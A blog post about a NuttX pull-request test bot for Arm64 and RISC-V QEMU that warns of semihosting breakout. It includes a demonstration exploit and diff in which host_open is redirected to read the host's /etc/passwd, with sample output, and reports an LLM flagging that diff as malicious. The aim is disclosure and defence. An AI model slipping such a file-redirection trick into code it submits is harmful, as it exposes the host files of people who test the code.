<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="generator" content="rustdoc">
    <title>QEMU Test Bot for Pull Requests: Beware of Semihosting Breakout (Apache NuttX RTOS)</title>

    
    <!-- Begin scripts/articles/*-header.html: Article Header for Custom Markdown files processed by rustdoc, like chip8.md -->
<meta property="og:title" 
    content="QEMU Test Bot for Pull Requests: Beware of Semihosting Breakout (Apache NuttX RTOS)" 
    data-rh="true">
<meta property="og:description" 
    content="Last week we saw our new Test Bot for NuttX Pull Requests, that will test on Real Hardware: Oz64 SG2000 RISC-V SBC. Today we extend our Test Bot to QEMU Emulators: Arm64 QEMU and RISC-V QEMU."
    data-rh="true">
<meta name="description" 
    content="Last week we saw our new Test Bot for NuttX Pull Requests, that will test on Real Hardware: Oz64 SG2000 RISC-V SBC. Today we extend our Test Bot to QEMU Emulators: Arm64 QEMU and RISC-V QEMU.">
<meta property="og:image" 
    content="https://lupyuen.org/images/testbot-flow.jpg">
<meta property="og:type" 
    content="article" data-rh="true">
<link rel="canonical"
    href="https://lupyuen.org/articles/testbot2.html" />
<!-- End scripts/articles/*-header.html -->
<!-- Begin scripts/rustdoc-header.html: Header for Custom Markdown files processed by rustdoc, like chip8.md -->
<link rel="alternate" type="application/rss+xml" title="RSS Feed for lupyuen" href="/rss.xml" />
<link rel="stylesheet" type="text/css" href="../normalize.css">
<link rel="stylesheet" type="text/css" href="../rustdoc.css" id="mainThemeStyle">
<link rel="stylesheet" type="text/css" href="../dark.css">
<link rel="stylesheet" type="text/css" href="../light.css" id="themeStyle">
<link rel="stylesheet" type="text/css" href="../prism.css">
<script src="../storage.js"></script><noscript>
<link rel="stylesheet" href="../noscript.css"></noscript>
<link rel="shortcut icon" href="../favicon.ico">
<style type="text/css">
    #crate-search {
        background-image: url("../down-arrow.svg");
    }
</style>
<!-- End scripts/rustdoc-header.html -->


</head>
<body class="rustdoc">
    <!--[if lte IE 8]>
    <div class="warning">
        This old browser is unsupported and will most likely display funky
        things.
    </div>
    <![endif]-->

    
    <!-- Begin scripts/rustdoc-before.html: Pre-HTML for Custom Markdown files processed by rustdoc, like chip8.md -->

    <!-- Begin Theme Picker -->
    <div class="theme-picker" style="left: 0"><button id="theme-picker" aria-label="Pick another theme!"><img src="../brush.svg"
        width="18" alt="Pick another theme!"></button>
        <div id="theme-choices"></div>
    </div>
    <!-- Theme Picker -->

    <!-- End scripts/rustdoc-before.html -->
    

    <h1 class="title">QEMU Test Bot for Pull Requests: Beware of Semihosting Breakout (Apache NuttX RTOS)</h1>
    <nav id="rustdoc"><ul>
<li><a href="#testing-arm64-on-qemu" title="Testing Arm64 on QEMU">1 Testing Arm64 on QEMU</a><ul></ul></li>
<li><a href="#testing-risc-v-on-qemu" title="Testing RISC-V on QEMU">2 Testing RISC-V on QEMU</a><ul></ul></li>
<li><a href="#semihosting-breakout" title="Semihosting Breakout">3 Semihosting Breakout</a><ul></ul></li>
<li><a href="#llm-says-nope" title="LLM Says Nope!">4 LLM Says Nope!</a><ul></ul></li>
<li><a href="#real-hardware-arm-and-esp32" title="Real Hardware: Arm and ESP32">5 Real Hardware: Arm and ESP32</a><ul></ul></li>
<li><a href="#whats-next" title="What’s Next">6 What’s Next</a><ul></ul></li></ul></nav><p>📝 <em>23 Feb 2025</em></p>
<p><img src="https://lupyuen.org/images/testbot-flow.jpg" alt="Test Bot for NuttX Pull Requests" /></p>
<p>Last week we saw our new <a href="https://lupyuen.org/articles/testbot.html"><strong>Test Bot</strong></a> for NuttX Pull Requests. When we post this <strong>PR Comment</strong>, it will Build and Test the Pull Request on Real Hardware: <a href="https://lupyuen.org/articles/sg2000"><strong>Oz64 SG2000 RISC-V SBC</strong></a></p>
<div class="example-wrap"><pre class="language-bash"><code>@nuttxpr test oz64:nsh</code></pre></div>
<p>Today we extend our Test Bot to <strong>QEMU Emulators</strong>: <a href="https://lupyuen.org/articles/testbot2#testing-arm64-on-qemu"><strong>Arm64 QEMU</strong></a> and <a href="https://lupyuen.org/articles/testbot2#testing-risc-v-on-qemu"><strong>RISC-V QEMU</strong></a></p>
<div class="example-wrap"><pre class="language-bash"><code>## Test this PR on QEMU Arm64:
## VirtIO Network, Block, RNG, Serial
@nuttxpr test qemu-armv8a:netnsh

## Test this PR on QEMU RISC-V:
## 64-bit Kernel Build
@nuttxpr test rv-virt:knsh64</code></pre></div>
<p><em>Testing a Pull Request with QEMU: Is it Totally Safe?</em></p>
<p>Not quite, beware of <a href="https://lupyuen.org/articles/testbot2#semihosting-breakout"><strong>Semihosting Breakout</strong></a>. Some LLMs might be helpful for flagging the <a href="https://lupyuen.org/articles/testbot2#llm-says-nope"><strong>Safety Issues</strong></a>.</p>
<p><em>How about Real Hardware for Arm and ESP32? Can we test our PRs there?</em></p>
<p>Yep we might support testing of Pull Requests on Other Hardware: <a href="https://lupyuen.org/articles/testbot2#real-hardware-arm-and-esp32"><strong>Arm32, Arm64 and ESP32</strong></a>. Some Boards might require a <a href="https://lupyuen.org/articles/testbot2#real-hardware-arm-and-esp32"><strong>MicroSD Multiplexer</strong></a>.</p>
<p><img src="https://lupyuen.org/images/testbot2-arm64.jpg" alt="Testing a Pull Request on Arm64 QEMU" /></p>
<h1 id="testing-arm64-on-qemu"><a class="doc-anchor" href="#testing-arm64-on-qemu">§</a>1 Testing Arm64 on QEMU</h1>
<p><em>Testing a Pull Request on Arm64 QEMU: How does it work?</em></p>
<div class="example-wrap"><pre class="language-bash"><code>@nuttxpr test qemu-armv8a:netnsh</code></pre></div>
<p>The PR Comment above will trigger our <a href="https://lupyuen.org/articles/testbot.html#test-bot-for-pull-requests"><strong>Test Bot Rust App</strong></a> to launch a Build + Test for QEMU Arm64: <a href="https://github.com/lupyuen/nuttx-build-farm/blob/main/build-test-arm64.sh">build-test-arm64.sh</a></p>
<div class="example-wrap"><pre class="language-bash"><code>## Configure NuttX for Arm64 QEMU with VirtIO and Networking
## https://nuttx.apache.org/docs/latest/platforms/arm64/qemu/boards/qemu-armv8a/index.html
tools/configure.sh qemu-armv8a:netnsh

## Build the NuttX Kernel and Apps
make -j

## Run the NuttX Test
expect arm64.exp</code></pre></div>
<p>Which will execute this <strong>Expect Script</strong>: <a href="https://github.com/lupyuen/nuttx-build-farm/blob/main/arm64.exp">arm64.exp</a></p>
<span style="font-size:80%">
<div class="example-wrap"><pre class="language-bash"><code>## Boot NuttX on Arm64 QEMU:
## Single Core with VirtIO Network, Block, RNG, Serial
qemu-system-aarch64 \
  -cpu cortex-a53 \
  -nographic \
  -machine virt,virtualization=on,gic-version=3 \
  -chardev stdio,id=con,mux=on \
  -serial chardev:con \
  -global virtio-mmio.force-legacy=false \
  -device virtio-serial-device,bus=virtio-mmio-bus.0 \
  -chardev socket,telnet=on,host=127.0.0.1,port=3450,server=on,wait=off,id=foo \
  -device virtconsole,chardev=foo \
  -device virtio-rng-device,bus=virtio-mmio-bus.1 \
  -netdev user,id=u1,hostfwd=tcp:127.0.0.1:10023-10.0.2.15:23,hostfwd=tcp:127.0.0.1:15001-10.0.2.15:5001 \
  -device virtio-net-device,netdev=u1,bus=virtio-mmio-bus.2 \
  -drive file=./mydisk-1gb.img,if=none,format=raw,id=hd \
  -device virtio-blk-device,bus=virtio-mmio-bus.3,drive=hd \
  -mon chardev=con,mode=readline \
  -kernel ./nuttx</code></pre></div></span>
<p>And validate the <a href="https://github.com/lupyuen/nuttx-build-farm/blob/main/arm64.exp#L76-L98"><strong>OSTest Output</strong></a>. <a href="https://lupyuen.org/articles/testbot.html#control-our-oz64-sbc">(Explained here)</a></p>
<p><a href="https://github.com/apache/nuttx/pull/15857#issuecomment-2665533412">(See the <strong>Pull Request</strong>)</a></p>
<p><a href="https://gitlab.com/lupyuen/nuttx-build-log/-/snippets/4808026">(See the <strong>Test Log</strong>)</a></p>
<p><img src="https://lupyuen.org/images/testbot2-riscv.jpg" alt="Testing a Pull Request on QEMU RISC-V" /></p>
<h1 id="testing-risc-v-on-qemu"><a class="doc-anchor" href="#testing-risc-v-on-qemu">§</a>2 Testing RISC-V on QEMU</h1>
<p><em>We just saw QEMU Arm64. What about QEMU RISC-V?</em></p>
<div class="example-wrap"><pre class="language-bash"><code>@nuttxpr test rv-virt:knsh64</code></pre></div>
<p>Works the same! When our <a href="https://lupyuen.org/articles/testbot.html#test-bot-for-pull-requests"><strong>Test Bot Rust App</strong></a> sees the above PR Comment, it will launch a Build + Test for QEMU RISC-V: <a href="https://github.com/lupyuen/nuttx-build-farm/blob/main/build-test-knsh64.sh">build-test-knsh64.sh</a></p>
<div class="example-wrap"><pre class="language-bash"><code>## Configure NuttX for QEMU RISC-V (64-bit Kernel Build)
## https://nuttx.apache.org/docs/latest/platforms/risc-v/qemu-rv/boards/rv-virt/index.html#knsh64
tools/configure.sh rv-virt:knsh64

## Build the NuttX Kernel
make -j

## Build the NuttX Apps
make -j export
pushd ../apps
./tools/mkimport.sh -z -x ../nuttx/nuttx-export-*.tar.gz
make -j import
popd

## Run the NuttX Test
expect qemu-riscv-knsh64.exp</code></pre></div>
<p>Which will call this <strong>Expect Script</strong>: <a href="https://github.com/lupyuen/nuttx-riscv64/blob/main/qemu-riscv-knsh64.exp">qemu-riscv-knsh64.exp</a></p>
<div class="example-wrap"><pre class="language-bash"><code>## Boot NuttX on QEMU Emulator for 64-bit RISC-V with OpenSBI
qemu-system-riscv64 \
  -semihosting \
  -M virt,aclint=on \
  -cpu rv64 \
  -kernel nuttx \
  -nographic</code></pre></div>
<p>And validate the <a href="https://github.com/lupyuen/nuttx-riscv64/blob/main/qemu-riscv-knsh64.exp#L62-L84"><strong>OSTest Output</strong></a>. <a href="https://lupyuen.org/articles/testbot.html#control-our-oz64-sbc">(Explained here)</a></p>
<p><a href="https://github.com/lupyuen2/wip-nuttx/pull/88#issuecomment-2671847491">(See the <strong>Pull Request</strong>)</a></p>
<p><a href="https://gitlab.com/lupyuen/nuttx-build-log/-/snippets/4808969">(See the <strong>Test Log</strong>)</a></p>
<p><a href="https://gist.github.com/lupyuen/1229510efa9c5b773ed0f4fd73e15e91">(See the <strong>Bot Log</strong>)</a></p>
<p><em>Is there a Test Controller for QEMU?</em></p>
<p>Nope Test Bot for QEMU doesn’t require a <a href="https://lupyuen.org/articles/testbot.html#connect-our-oz64-sbc"><strong>Test Controller</strong></a>. We run the QEMU Tests directly on our <a href="https://lupyuen.org/articles/testbot.html#control-our-oz64-sbc"><strong>Build &amp; Test Server</strong></a>. Which might be unsafe…</p>
<blockquote>
<p><img src="https://lupyuen.org/images/semihost-qemu.jpg" alt="Beware of Semihosting, it might break out from the QEMU Sandbox and into our Host Computer" /></p>
</blockquote>
<h1 id="semihosting-breakout"><a class="doc-anchor" href="#semihosting-breakout">§</a>3 Semihosting Breakout</h1>
<p><em>Testing a Pull Request with QEMU: Should be Totally Safe right?</em></p>
<p>Nope <strong>Beware of Semihosting</strong>, it might break out from the QEMU Sandbox and into our Host Computer! Here’s why…</p>
<div class="example-wrap"><pre class="language-bash"><code>## Let&#39;s run this on QEMU RISC-V Kernel Build
## (For rv-virt:knsh64)
nsh&gt; hello
Hello, World!!</code></pre></div>
<p><strong>For RISC-V Kernel Build</strong>: <em>hello</em> is actually an <strong>ELF Executable</strong> located at <em>/system/bin</em>…</p>
<div class="example-wrap"><pre class="language-bash"><code>## Equivalent to this ELF Executable
## (For rv-virt:knsh64)
nsh&gt; /system/bin/hello
Hello, World!!</code></pre></div>
<p><em>Where is /system/bin? Don’t recall bundling any ELF Executables?</em></p>
<p>The ELF Executables exist on Our Computer’s <strong>Local Filesystem</strong>… Outside QEMU and the NuttX Filesystem.</p>
<p><img src="https://lupyuen.org/images/testbot2-apps.png" alt="ELF Executables exist on Our Computer’s Local Filesystem… Outside QEMU and the NuttX Filesystem" /></p>
<p>This is called <a href="https://lupyuen.org/articles/semihost#nuttx-calls-semihosting"><strong>Semihosting</strong></a>, it gives QEMU direct access to our computer’s filesystem. We <a href="https://nuttx.apache.org/docs/latest/platforms/risc-v/qemu-rv/boards/rv-virt/index.html#configurations"><strong>Enabled Semihosting</strong></a> when we started QEMU…</p>
<div class="example-wrap"><pre class="language-bash"><code>## For NuttX Kernel Build: (rv-virt:knsh64)
## QEMU must run with Semihosting Enabled
qemu-system-riscv64 \
  -semihosting \
  -M virt,aclint=on \
  -cpu rv64 \
  -bios none \
  -kernel nuttx \
  -nographic</code></pre></div>
<p><a href="https://nuttx.apache.org/docs/latest/quickstart/running.html">(Semihosting is also used by <strong>OpenOCD</strong> for debugging <strong>Arm32 Devices</strong>)</a></p>
<p><em>Thus NuttX could break out of QEMU? And access anything in our computer’s filesystem?</em></p>
<p>Exactly. This is our <strong>“Exploit Code”</strong> for NuttX Semihosting: <a href="https://github.com/lupyuen2/wip-nuttx/blob/sbo/arch/risc-v/src/common/riscv_hostfs.c#L117-L141">riscv_hostfs.c</a></p>
<div class="example-wrap"><pre class="language-c"><code>// When NuttX opens a file via Semihosting...
int host_open(const char *pathname, int flags, int mode) {

  // Let&#39;s print the pathname
  _info(&quot;pathname=%s\n&quot;, pathname);

  // If NuttX tries to access the `hello` ELF Executable:
  // Route the access to `/etc/passwd` instead
  const char *pathname2 =
    (strcmp(pathname, &quot;../apps/bin/hello&quot;) == 0)
    ? &quot;/etc/passwd&quot;
    : pathname;

  // Rest of the code is unchanged
  // Except `pathname` becomes `pathname2`
  struct {
    const char *pathname;
    long mode;
    size_t len;
  } open = {
    .pathname = pathname2,
    .mode     = host_flags_to_mode(flags),
    .len      = strlen(pathname2),
  };

  // Make a Semihosting Call to QEMU
  // Via the RISC-V EBREAK Instruction
  return host_call(HOST_OPEN, &amp;open, sizeof(open));
}</code></pre></div>
<p>Something seriously sinister happens in NuttX and QEMU… Our “Exploit Code” dumps <em>/etc/passwd</em> from our <strong>Local Computer</strong>!</p>
<div class="example-wrap"><pre class="language-bash"><code>## Let&#39;s dump the `hello` ELF Executable
nsh&gt; cat /system/bin/hello
host_open: pathname=../apps/bin/cat
host_open: pathname=../apps/bin/hello

## Whoa NuttX dumps `/etc/passwd` from our Local Computer!
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false</code></pre></div>
<p><a href="https://gist.github.com/lupyuen/a1c06b6cbf08feedee4d711b21561705#file-gistfile1-txt-L1238-L1246">(See the <strong>Complete Log</strong>)</a></p>
<p>Hence it’s <strong>Not Safe</strong> to test somebody’s Pull Request on our computer. Unless we inpect the PR Code very carefully.</p>
<p><a href="https://lupyuen.org/articles/testbot.html#securing-our-bot">(<strong>Arm32 + OpenOCD</strong> might be prone to Semihosting Exploit)</a></p>
<p><a href="https://lupyuen.org/articles/rust6#appendix-nuttx-qemu-risc-v-fails-on-github-actions">(<strong>nsh64</strong> and <strong>knsh64</strong> will fail on Docker)</a></p>
<h1 id="llm-says-nope"><a class="doc-anchor" href="#llm-says-nope">§</a>4 LLM Says Nope!</h1>
<p><em>Bummer. Will LLM tell us if the Pull Request is Safe for Testing Locally?</em></p>
<p>Let’s find out. We crafted a <strong>“Malicious Pull Request”</strong> with our “Exploit Code”…</p>
<ul>
<li><a href="https://github.com/lupyuen2/wip-nuttx/pull/89/files"><strong>“Pull Request that might be Safe or Unsafe”</strong></a></li>
</ul>
<p>We append <strong><code>.diff</code></strong> to the Pull Request URL…</p>
<div class="example-wrap"><pre class="language-bash"><code>github.com/lupyuen2/wip-nuttx/pull/89.diff</code></pre></div>
<p>To produce a barebones <a href="https://patch-diff.githubusercontent.com/raw/lupyuen2/wip-nuttx/pull/89.diff"><strong>Diff Patch</strong></a> for our “Malicious Pull Request”…</p>
<p><img src="https://lupyuen.org/images/testbot2-diff.png" alt="Diff Patch for our “Malicious Pull Request”" /></p>
<p>And we feed the Diff Patch to <strong>Any LLM</strong>…</p>
<span style="font-size:80%">
<blockquote>
<p><em>Here is a Pull Request for Apache NuttX RTOS that I will check out to my computer and test on QEMU RISC-V 64-bit Kernel Mode. Is it safe to build and test this Pull Request on my computer?</em></p>
</blockquote>
<div class="example-wrap"><pre class="language-text"><code>diff --git a/arch/risc-v/src/common/riscv_hostfs.c b/arch/risc-v/src/common/riscv_hostfs.c
index aa1409d6a05b0..db54f11ae7623 100644
--- a/arch/risc-v/src/common/riscv_hostfs.c
+++ b/arch/risc-v/src/common/riscv_hostfs.c
@@ -33,6 +33,7 @@
 #include &lt;string.h&gt;
 #include &lt;syscall.h&gt;
 #include &lt;unistd.h&gt;
+#include &lt;debug.h&gt;
 
 /****************************************************************************
  * Pre-processor Definitions
@@ -115,6 +116,11 @@ static int host_flags_to_mode(int flags)
 
 int host_open(const char *pathname, int flags, int mode)
 {
+  _info(&quot;pathname=%s\n&quot;, pathname);
+  const char *pathname2 =
+    (strcmp(pathname, &quot;../apps/bin/hello&quot;) == 0)
+    ? &quot;/etc/passwd&quot;
+    : pathname;
   struct
   {
     const char *pathname;
@@ -122,9 +128,9 @@ int host_open(const char *pathname, int flags, int mode)
     size_t len;
   } open =
   {
-    .pathname = pathname,
+    .pathname = pathname2,
     .mode = host_flags_to_mode(flags),
-    .len = strlen(pathname),
+    .len = strlen(pathname2),
   };
 
 #ifdef CONFIG_RISCV_SEMIHOSTING_HOSTFS_CACHE_COHERENCE</code></pre></div></span>
<p><a href="https://gist.github.com/lupyuen/d5a6ac395744c1f33e10690105e20900#prompt-to-llm">(See the <strong>LLM Prompt</strong>)</a></p>
<p>The LLM we tested <em>(Gemini Pro 2.0 Experimental)</em> says…</p>
<span style="font-size:80%">
<blockquote>
<p>This pull request is <strong>absolutely not safe</strong> to build and test as-is, and it contains a very obvious and serious security vulnerability …</p>
</blockquote>
<ol>
<li>
<p><strong>Pathname Redirection:</strong>  The code checks if the requested <code>pathname</code> is <code>"../apps/bin/hello"</code>.  If it is, it <em>replaces</em> the requested path with <code>"/etc/passwd"</code>.  This is a deliberate, hardcoded attempt to read the host system’s password file …</p>
</li>
<li>
<p><strong>Semihosting Abuse:</strong> This code is within the <code>host_open</code> function, which is part of NuttX’s semihosting implementation (<code>CONFIG_RISCV_SEMIHOSTING_HOSTFS</code>) … This code exploits semihosting to access arbitrary files on your <em>host</em> operating system.  Essentially, the embedded code is making a system call <em>on your computer</em>, not within the isolated QEMU environment.</p>
</li>
<li>
<p><strong>No Sanitization:</strong>  Even if the <code>pathname</code> is <em>not</em> <code>"../apps/bin/hello"</code>, there’s no sanitization or validation of the requested file path.  An attacker could potentially provide a crafted <code>pathname</code> to access <em>any</em> file on your host system …</p>
</li>
</ol>
</span>
<p><a href="https://gist.github.com/lupyuen/d5a6ac395744c1f33e10690105e20900#response-from-llm-gemini-advanced-20-flash">(See the <strong>LLM Response</strong>)</a></p>
<p><a href="https://gist.github.com/lupyuen/d5a6ac395744c1f33e10690105e20900">(Gemini Flash 2.0? It neglected the <strong>Semihosting</strong>)</a></p>
<p>OK Smarty Pants LLM, you foiled our “Malicious Pull Request”. Could you possibly stop EVERY Malicious Pull Request? 🤔</p>
<p><img src="https://lupyuen.org/images/testbot2-flow.jpg" alt="Testing PinePhone with MicroSD Multiplexer" /></p>
<h1 id="real-hardware-arm-and-esp32"><a class="doc-anchor" href="#real-hardware-arm-and-esp32">§</a>5 Real Hardware: Arm and ESP32</h1>
<ol>
<li>
<p><em>How about NuttX Arm64: Testing on Real Hardware?</em></p>
<p>Ah this becomes an interesting challenge: Arm64 Devices will boot NuttX on a <strong>MicroSD Card</strong>. Which requires <strong>Human Intervention</strong> to Flash the MicroSD Card and insert into the Arm64 Device.</p>
<p>But there’s hope for Automated Testing! We ordered a <a href="https://www.tindie.com/products/3mdeb/sd-wire-sd-card-reader-sd-card-mux/"><strong>MicroSD Multiplexer</strong></a> that will (electrically) Swap a MicroSD between a Test Controller PC and the Arm64 Test Device.</p>
<p>We’ll test the MicroSD Multiplexer with <a href="https://lupyuen.org/articles/what"><strong>PinePhone NuttX</strong></a> real soon. Check out the article…</p>
<p><a href="https://lupyuen.org/articles/testbot3.html"><strong>“PR Test Bot for PinePhone (Apache NuttX RTOS)”</strong></a></p>
</li>
<li>
<p><em>Testing on Arm32 Hardware should be easier? STM32, nRF52, RP2040?</em></p>
<p>Yep just modify the <a href="https://lupyuen.org/articles/testbot.html#build-and-test-script"><strong>Build &amp; Test Script</strong></a> and <a href="https://lupyuen.org/articles/testbot.html#control-our-oz64-sbc"><strong>Expect Script</strong></a> to call <a href="https://nuttx.apache.org/docs/latest/quickstart/running.html"><strong>OpenOCD + ST-Link + Semihosting</strong></a>. Lemme know if you have questions! 🙏</p>
</li>
<li>
<p><em>And ESP32 Hardware? Xtensa + RISC-V?</em></p>
<p>We’re hoping the <strong>Kind Folks at Espressif</strong> could help to modify the <a href="https://lupyuen.org/articles/testbot.html#build-and-test-script"><strong>Build &amp; Test Script</strong></a> and <a href="https://lupyuen.org/articles/testbot.html#control-our-oz64-sbc"><strong>Expect Script</strong></a> for our PR Test Bot.</p>
<p>Then we can easily test any NuttX Pull Request on <strong>Real ESP32 Hardware</strong>, Xtensa and RISC-V. 👍</p>
</li>
</ol>
<h1 id="whats-next"><a class="doc-anchor" href="#whats-next">§</a>6 What’s Next</h1>
<p>Next week we take a break from Continuous Integration. We’ll chat about the (literally) Hot New RISC-V SBC: <strong>StarPro64 EIC7700X</strong>…</p>
<ul>
<li><a href="https://lupyuen.org/articles/starpro64.html"><strong>“StarPro64 EIC7700X RISC-V SBC: Maybe LLM on NPU on NuttX?”</strong></a></li>
</ul>
<p>Special Thanks to <strong>Mr Gregory Nutt</strong> for your guidance and kindness. I’m also grateful to <a href="https://lupyuen.org/articles/sponsor"><strong>My Sponsors</strong></a>, for supporting my writing.</p>
<ul>
<li>
<p><a href="https://lupyuen.org/articles/sponsor"><strong>Sponsor me a coffee</strong></a></p>
</li>
<li>
<p><a href="https://news.ycombinator.com/item?id=43143394"><strong>Discuss this article on Hacker News</strong></a></p>
</li>
<li>
<p><a href="https://nuttx-forge.org/lupyuen/nuttx-sg2000"><strong>My Current Project: “Apache NuttX RTOS for Sophgo SG2000”</strong></a></p>
</li>
<li>
<p><a href="https://nuttx-forge.org/lupyuen/nuttx-ox64"><strong>My Other Project: “NuttX for Ox64 BL808”</strong></a></p>
</li>
<li>
<p><a href="https://nuttx-forge.org/lupyuen/nuttx-star64"><strong>Older Project: “NuttX for Star64 JH7110”</strong></a></p>
</li>
<li>
<p><a href="https://nuttx-forge.org/lupyuen/pinephone-nuttx"><strong>Olderer Project: “NuttX for PinePhone”</strong></a></p>
</li>
<li>
<p><a href="https://lupyuen.org"><strong>Check out my articles</strong></a></p>
</li>
<li>
<p><a href="https://lupyuen.org/rss.xml"><strong>RSS Feed</strong></a></p>
</li>
</ul>
<p><em>Got a question, comment or suggestion? Create an Issue or submit a Pull Request here…</em></p>
<p><a href="https://codeberg.org/lupyuen/lupyuen.org/src/branch/master/src/testbot2.md"><strong>lupyuen.org/src/testbot2.md</strong></a></p>

    
    <!-- Begin scripts/rustdoc-after.html: Post-HTML for Custom Markdown files processed by rustdoc, like chip8.md -->

    <!-- Begin Theme Picker and Prism Theme -->
    <script src="../theme.js"></script>
    <script src="../prism.js"></script>
    <!-- Theme Picker and Prism Theme -->

    <!-- End scripts/rustdoc-after.html -->
    

</body>
</html>